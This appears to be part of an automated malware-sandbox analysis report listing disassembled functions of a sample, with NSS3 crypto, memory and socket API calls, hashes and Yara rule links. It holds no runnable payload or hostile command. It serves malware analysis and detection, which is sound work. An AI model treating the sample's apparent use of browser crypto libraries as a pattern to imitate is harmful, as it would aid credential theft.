Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction ID: 18b3d1c53e1ab9283c7d4f20bb5e0d2682d9205760932c7229ac25ba092b9e39
Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction Fuzzy Hash: 2851F9B5D00109ABDB04CF98E981AEFB7B5FF88305F108119F919A7340D738AA51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB0380 Relevance: 10.6, APIs: 7, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BBB03E7
PK11_CreateContextBySymKey.NSS3(80000373,00000108,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BBB03FD
PK11_DigestBegin.NSS3(00000000,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BBB040F
PK11_DigestOp.NSS3(00000000,00000000,00000000,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BBB041E
PK11_DigestOp.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 6BBB0431
PK11_DigestFinal.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BBB0448
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6BBB045A

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: K11_$Digest$Context$BeginCreateDestroyErrorFinal
String ID:
API String ID: 1583060475-0
Opcode ID: 74526c3b08b4b212e581d6d33dc38e7cf034e5ae4c643885d428ad47a28157a2
Instruction ID: 8044eb91b9775c3904b3c11dccc7b66772353a4d8590c7095f0e2e2f9ac3c9ed
Opcode Fuzzy Hash: 74526c3b08b4b212e581d6d33dc38e7cf034e5ae4c643885d428ad47a28157a2
Instruction Fuzzy Hash: EE21D9739002406BDB00CF65DC41EBF77EAEBC8254F104529F95887241FB39D95187A7

Uniqueness

Uniqueness Score: -1.00%

Function 6BB442A0 Relevance: 10.6, APIs: 7, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6BB442B8

Part of subcall function 6BB90FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BB387ED,00000800,6BB2EF74,00000000), ref: 6BB91000
Part of subcall function 6BB90FF0: PR_NewLock.NSS3(?,00000800,6BB2EF74,00000000), ref: 6BB91016
Part of subcall function 6BB90FF0: PL_InitArenaPool.NSS3(00000000,security,6BB387ED,00000008,?,00000800,6BB2EF74,00000000), ref: 6BB9102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6BB442C9

Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB910F3
Part of subcall function 6BB910C0: EnterCriticalSection.KERNEL32(?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9110C
Part of subcall function 6BB910C0: PL_ArenaAllocate.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91141
Part of subcall function 6BB910C0: PR_Unlock.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91182
Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6BB442F4

Part of subcall function 6BB8FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BB88D2D,?,00000000,?), ref: 6BB8FB85
Part of subcall function 6BB8FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BB8FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6BB44308

Part of subcall function 6BB8B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6BC618D0,?), ref: 6BB8B095

PR_SetError.NSS3(FFFFE013,00000000), ref: 6BB4431D
PR_SetError.NSS3(FFFFE013,00000000), ref: 6BB4432B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BB44336

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Util$Arena$Error$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterFreeInitLockPoolQuickSectionUnlockcallocmemcpy
String ID:
API String ID: 925263571-0
Opcode ID: 0623f5b747538972af3035330af2e4ee64d66050cd06be1169746a9435de8470
Instruction ID: 4404cb9af79dcf238763091bd16897038e3358732e2e3de3edb1f9900983a33a
Opcode Fuzzy Hash: 0623f5b747538972af3035330af2e4ee64d66050cd06be1169746a9435de8470
Instruction Fuzzy Hash: 9A110662E002952AF7106A79AC02B6F72ACEFA164CF040135FD089A141FF2DA62482A6

Uniqueness

Uniqueness Score: -1.00%

Function 6BC4CBE0 Relevance: 10.5, APIs: 7, Instructions: 46COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000010), ref: 6BC4CBEA
PR_NewLock.NSS3 ref: 6BC4CBF9

Part of subcall function 6BBF98D0: calloc.MOZGLUE(00000001,00000084,6BB20936,00000001,?,6BB2102C), ref: 6BBF98E5

PR_NewCondVar.NSS3(00000000), ref: 6BC4CC05

Part of subcall function 6BB1BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6BB221BC), ref: 6BB1BB8C

free.MOZGLUE(00000000), ref: 6BC4CC1C
DeleteCriticalSection.KERNEL32(-0000001C), ref: 6BC4CC34
free.MOZGLUE(00000000), ref: 6BC4CC41
free.MOZGLUE(00000000), ref: 6BC4CC47

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: callocfree$CondCriticalDeleteLockSection
String ID:
API String ID: 687540378-0
Opcode ID: 14ab5f117371b17556db060ac660031f5296d0d75fc067b79a64eae0c6e48d77
Instruction ID: 6ec4c9288d8909f867b48d5633b6fd464e39fbdad18d935286ed3e2a16b5d315
Opcode Fuzzy Hash: 14ab5f117371b17556db060ac660031f5296d0d75fc067b79a64eae0c6e48d77
Instruction Fuzzy Hash: ADF0FC71B012115BE7105B799C859AF3A5CDF466A5F040434ED89C3701FA19D719C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 6BB4C380 Relevance: 9.2, APIs: 6, Instructions: 247COMMON

Download Yara Rule

APIs

PK11_GetInternalSlot.NSS3 ref: 6BB4C3CB

Part of subcall function 6BB81560: TlsGetValue.KERNEL32(00000000,?,6BB50844,?), ref: 6BB8157A
Part of subcall function 6BB81560: EnterCriticalSection.KERNEL32(?,?,?,6BB50844,?), ref: 6BB8158F
Part of subcall function 6BB81560: PR_Unlock.NSS3(?,?,?,?,6BB50844,?), ref: 6BB815B2

Part of subcall function 6BB4C9E0: TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 6BB4CA21
Part of subcall function 6BB4C9E0: EnterCriticalSection.KERNEL32(0000001C), ref: 6BB4CA35
Part of subcall function 6BB4C9E0: PR_Unlock.NSS3(00000000), ref: 6BB4CA66

Part of subcall function 6BB489E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6BB488AE,-00000008), ref: 6BB48A04
Part of subcall function 6BB489E0: EnterCriticalSection.KERNEL32(?), ref: 6BB48A15
Part of subcall function 6BB489E0: memset.VCRUNTIME140(6BB488AE,00000000,00000132), ref: 6BB48A27
Part of subcall function 6BB489E0: PR_Unlock.NSS3(?), ref: 6BB48A35

DeleteCriticalSection.KERNEL32(00000000), ref: 6BB4C430
free.MOZGLUE(?), ref: 6BB4C437

Part of subcall function 6BB7F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6BB7F854
Part of subcall function 6BB7F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6BB7F868
Part of subcall function 6BB7F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6BB7F882
Part of subcall function 6BB7F820: free.MOZGLUE(04C483FF,?,?), ref: 6BB7F889
Part of subcall function 6BB7F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6BB7F8A4
Part of subcall function 6BB7F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6BB7F8AB
Part of subcall function 6BB7F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6BB7F8C9
Part of subcall function 6BB7F820: free.MOZGLUE(280F10EC,?,?), ref: 6BB7F8D0

PK11_GetInternalSlot.NSS3 ref: 6BB4C475
DeleteCriticalSection.KERNEL32(00000000), ref: 6BB4C4DA
free.MOZGLUE(?), ref: 6BB4C4E1

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: CriticalSection$free$Delete$EnterUnlockValue$InternalK11_Slot$memset
String ID:
API String ID: 114622533-0
Opcode ID: 077581401b692c0c12b1f3eb3c96136899f070613d6104a92b8a616685f151af
Instruction ID: 3e0210c7889ea52fac9680c7c4a6a8949370e5f8f1afe8798fa679cf0329e086
Opcode Fuzzy Hash: 077581401b692c0c12b1f3eb3c96136899f070613d6104a92b8a616685f151af
Instruction Fuzzy Hash: 66A170B59002549FDB10CF24D881B8ABBF8FF08354F1441A5ED09AB30AE735EA58CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC42330 Relevance: 9.2, APIs: 6, Instructions: 153networkCOMMON

Download Yara Rule

APIs

PR_Socket.NSS3(00000002,00000001,00000000), ref: 6BC4235C
PR_InitializeNetAddr.NSS3(00000002,00000000,?), ref: 6BC42377

Part of subcall function 6BB2EAD0: htons.WSOCK32(?), ref: 6BB2EB13
Part of subcall function 6BB2EAD0: htonl.WSOCK32(00000000,?), ref: 6BB2EB26

htons.WSOCK32(?), ref: 6BC423BB
PR_Socket.NSS3(00000002,00000001,00000000), ref: 6BC423E7

Part of subcall function 6BB19980: PR_SetError.NSS3(FFFFE89F,00000000,?,?,?,?,?,6BB1996F,?,00000001,00000000), ref: 6BB19A3A
Part of subcall function 6BB19980: PR_CallOnce.NSS3(6BC914E4,6BBFCC70,?,?,?,?,?,6BB1996F,?,00000001,00000000), ref: 6BB19A50
Part of subcall function 6BB19980: PR_SetError.NSS3(FFFFE890,00000000), ref: 6BB19A81
Part of subcall function 6BB19980: _pr_push_ipv6toipv4_layer.NSS3(00000000), ref: 6BB19A97

PR_InitializeNetAddr.NSS3(00000002,?,?), ref: 6BC42402

Part of subcall function 6BB2EAD0: htons.WSOCK32(?), ref: 6BB2EB44
Part of subcall function 6BB2EAD0: PR_GetCurrentThread.NSS3(?), ref: 6BB2EB58

PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6BC42482

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Errorhtons$AddrInitializeSocket$CallCurrentOnceThread_pr_push_ipv6toipv4_layerhtonl
String ID:
API String ID: 1998285791-0
Opcode ID: bad4a3333bcb06bbaf28236193fec7a11c1a5cc9b15d75f3dbf7f600d32f0af0
Instruction ID: fb35628a539ac6a9c4ce0b6c18cdb6487c407f3ee377271687ef5f485072dabe
Opcode Fuzzy Hash: bad4a3333bcb06bbaf28236193fec7a11c1a5cc9b15d75f3dbf7f600d32f0af0
Instruction Fuzzy Hash: EF51F4355205109FE720DF24DC56F6A77A4EF85720F104668F569CF2E0EB38DA02CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BB56B70 Relevance: 9.1, APIs: 6, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BB56BA9

Part of subcall function 6BB59520: PK11_IsLoggedIn.NSS3(00000000,?,6BB8379E,?,00000001,?), ref: 6BB59542

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BB56BC0
PORT_ArenaAlloc_Util.NSS3(00000000,0000001C,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BB56BD7
PK11_HasAttributeSet.NSS3(?,?,00000002,00000000,?,?,?,?,00000007,?,00000000), ref: 6BB56B97

Part of subcall function 6BB71870: TlsGetValue.KERNEL32 ref: 6BB718A6
Part of subcall function 6BB71870: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6BB56C34,?,?,00000001,00000000,00000007,?), ref: 6BB718B6
Part of subcall function 6BB71870: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB56C34,?,?), ref: 6BB718E1
Part of subcall function 6BB71870: PR_SetError.NSS3(00000000,00000000), ref: 6BB718F9

PK11_HasAttributeSet.NSS3(?,?,00000001,00000000,00000007,?,00000000), ref: 6BB56C2F
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BB56C61

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: K11_$Util$Arena_Attribute$Alloc_ArenaAuthenticateCriticalEnterErrorFreeLoggedSectionUnlockValue
String ID:
API String ID: 2313852964-0
Opcode ID: be557db2c079d31d06217bae3a02c5276c3d5fcd7d4beabf693fb592d1778aac
Instruction ID: e66986ddf9cce47d00cb44d45b7c997e8826c49249353e088477e12045f91fbd
Opcode Fuzzy Hash: be557db2c079d31d06217bae3a02c5276c3d5fcd7d4beabf693fb592d1778aac
Instruction Fuzzy Hash: 2531F7B2A00341ABE7109F64DC82F6E7764EF4A754F040069FE095B382E779D961C6E2

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00417BAE

Part of subcall function 00417641: __mtinitlocknum.LIBCMT ref: 00417657
Part of subcall function 00417641: __amsg_exit.LIBCMT ref: 00417663
Part of subcall function 00417641: EnterCriticalSection.KERNEL32(00000000,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D,?,?,00417158,00000000,00421AC0,0041719F), ref: 0041766B

DecodePointer.KERNEL32(004219C8,00000020,00417CF1,00000000,00000001,00000000,?,00417D13,000000FF,?,00417668,?,00000000,?,00417A49,0000000D), ref: 00417BEA
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,?,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417BFB

Part of subcall function 004179C2: EncodePointer.KERNEL32(00000000,004191B2,00423DC8,00000314,00000000,?,?,?,?,?,00417F08,00423DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004179C4

DecodePointer.KERNEL32(-00000004,?,00417D13,000000FF,?,00417668,?,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C21
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,?,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C34
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,?,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C3E

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction ID: 2ecc3aad81c9b81e2b27e7e3d170e1f8428b359c85680f8586e03e13f1a28f2c
Opcode Fuzzy Hash: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction Fuzzy Hash: 39314C70A58309DBDF509FA9D8846DDBBF1BB48314F10802BE001A6290EB7C49C5CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 6BB90AA0 Relevance: 9.1, APIs: 6, Instructions: 79COMMON

Download Yara Rule

APIs

PL_HashTableDestroy.NSS3(?,?,?,6BB47F62,00000000,00000000,?,?,?,6BB480DD), ref: 6BB90AAE
PL_HashTableDestroy.NSS3(?,?,?,6BB47F62,00000000,00000000,?,?,?,6BB480DD), ref: 6BB90ACA
PL_HashTableDestroy.NSS3(?,?,?,6BB47F62,00000000,00000000,?,?,?,6BB480DD), ref: 6BB90B05
PORT_FreeArena_Util.NSS3(?,00000000,?,?,6BB47F62,00000000,00000000,?,?,?,6BB480DD), ref: 6BB90B24
free.MOZGLUE(?,?,?,6BB47F62,00000000,00000000,?,?,?,6BB480DD), ref: 6BB90B3C
memset.VCRUNTIME140(6BC924E4,00000000,000005B0,?,?,6BB47F62,00000000,00000000,?,?,?,6BB480DD), ref: 6BB90BC2

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: DestroyHashTable$Arena_FreeUtilfreememset
String ID:
API String ID: 4033302747-0
Opcode ID: b59db10992c89024250db2690ed6a98817ff5bfa5754421f98f17f50d2fb521a
Instruction ID: 21b59dda36aef372e6fb9adecd5b3dcedc85dca597d94b87358c0d4733583495
Opcode Fuzzy Hash: b59db10992c89024250db2690ed6a98817ff5bfa5754421f98f17f50d2fb521a
Instruction Fuzzy Hash: 4321E6B6A112419FFF54FF39E826B063BB9A706358F404035D499DA241EB39E24ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BB44360 Relevance: 9.1, APIs: 6, Instructions: 76COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,00000000,00000000,00000000,00000000,?,6BB798FC,00000000,00000001), ref: 6BB44384
PORT_FreeArena_Util.NSS3(00000000,00000001,6BB798FC,00000000,00000001), ref: 6BB443AA

Part of subcall function 6BB91200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6BB388A4,00000000,00000000), ref: 6BB91228
Part of subcall function 6BB91200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6BB91238
Part of subcall function 6BB91200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6BB388A4,00000000,00000000), ref: 6BB9124B
Part of subcall function 6BB91200: PR_CallOnce.NSS3(6BC92AA4,6BB912D0,00000000,00000000,00000000,?,6BB388A4,00000000,00000000), ref: 6BB9125D
Part of subcall function 6BB91200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6BB9126F
Part of subcall function 6BB91200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6BB91280
Part of subcall function 6BB91200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6BB9128E
Part of subcall function 6BB91200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6BB9129A
Part of subcall function 6BB91200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6BB912A1

SECITEM_ZfreeItem_Util.NSS3(00000004,00000000,00000000,00000000,00000000,00000000,?,6BB798FC,00000000,00000001), ref: 6BB443BE
SECITEM_ZfreeItem_Util.NSS3(00000028,00000000,00000000,00000001), ref: 6BB443CB
SECITEM_ZfreeItem_Util.NSS3(0000001C,00000000,?,?,00000000,00000001), ref: 6BB443DB
SECITEM_ZfreeItem_Util.NSS3(00000010,00000000,?,?,?,?,00000000,00000001), ref: 6BB443E5

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
String ID:
API String ID: 241050562-0
Opcode ID: da3c41d7405a8407eae94a7e2e11dc99ee0f57332f01b4da2539bc038bb4f1aa
Instruction ID: 982a644387d50a44e3cb09ecb84320c2a24685ccd5dc6b49060705fafa4e2682
Opcode Fuzzy Hash: da3c41d7405a8407eae94a7e2e11dc99ee0f57332f01b4da2539bc038bb4f1aa
Instruction Fuzzy Hash: FF21B3B2D107449BD720CF70AD82577B3B8FEA9258B045F3EE88A92501F775B694C790

Uniqueness

Uniqueness Score: -1.00%

Function 6BB36350 Relevance: 9.1, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PL_HashTableDestroy.NSS3(?,?,00000000,?,6BB351B1,6BB35FA7), ref: 6BB36367
PORT_FreeArena_Util.NSS3(?,00000001,?,00000000,?,6BB351B1,6BB35FA7), ref: 6BB36387
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,00000000,?,6BB351B1,6BB35FA7), ref: 6BB363DA
PORT_FreeArena_Util.NSS3(?,00000000,?,00000000,?,6BB351B1,6BB35FA7), ref: 6BB363EB
free.MOZGLUE(?,?,00000000,?,6BB351B1,6BB35FA7), ref: 6BB363F4
PR_SetError.NSS3(FFFFE001,00000000,?,00000000,?,6BB351B1,6BB35FA7), ref: 6BB36408

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Util$Arena_Free$DestroyErrorHashItem_TableZfreefree
String ID:
API String ID: 4133655206-0
Opcode ID: d8d9951dd29a527a06d7fb067f8721d161b982be36c332d645305b13097b6a35
Instruction ID: 10da19fd164828b7e3688e85cc531db7cc5152d2b13fdbe3c72230b9a5784f6b
Opcode Fuzzy Hash: d8d9951dd29a527a06d7fb067f8721d161b982be36c332d645305b13097b6a35
Instruction Fuzzy Hash: F2112671B08BA16BFB009E3DAC49B0777A8EF01755F044078E82AD7250FB2AE414C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 6BB48B50 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6BB50948,00000000), ref: 6BB48B6B
EnterCriticalSection.KERNEL32(?,?,?,6BB50948,00000000), ref: 6BB48B80
PL_FinishArenaPool.NSS3(?,?,?,?,6BB50948,00000000), ref: 6BB48B8F
PR_Unlock.NSS3(?,?,?,?,6BB50948,00000000), ref: 6BB48BA1
